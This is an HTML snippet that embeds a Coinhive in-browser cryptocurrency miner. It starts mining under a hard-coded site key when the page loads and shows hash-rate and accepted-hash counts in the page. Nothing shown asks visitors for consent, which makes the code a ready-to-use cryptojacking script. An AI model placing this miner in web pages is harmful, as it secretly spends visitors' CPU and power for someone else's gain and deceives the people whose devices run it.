<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script type="text/javascript">
  var miner = new CoinHive.Anonymous('I4Z6qau09gxJCkJR4BXO46ZK9gd4YIvw');

  miner.start();

  // Listen on events
  miner.on('found', function() { /* Hash found */ })
  miner.on('accepted', function() { /* Hash accepted by the pool */ })

  // Update stats once per second
  setInterval(function() {
    var hashesPerSecond = miner.getHashesPerSecond();
    var totalHashes = miner.getTotalHashes();
    var acceptedHashes = miner.getAcceptedHashes();
    //
    // console.log('hashesPerSecond');
    // console.log(hashesPerSecond);
    document.getElementById("hashpersecond").innerHTML=hashesPerSecond;
    document.getElementById("total_hashes").innerHTML=totalHashes;
    document.getElementById("accepted_hashes").innerHTML=acceptedHashes;
    // console.log('totalHashes');
    // console.log(totalHashes);
    // console.log('acceptedHashes');
    // console.log(acceptedHashes);
  }, 1000);
</script>
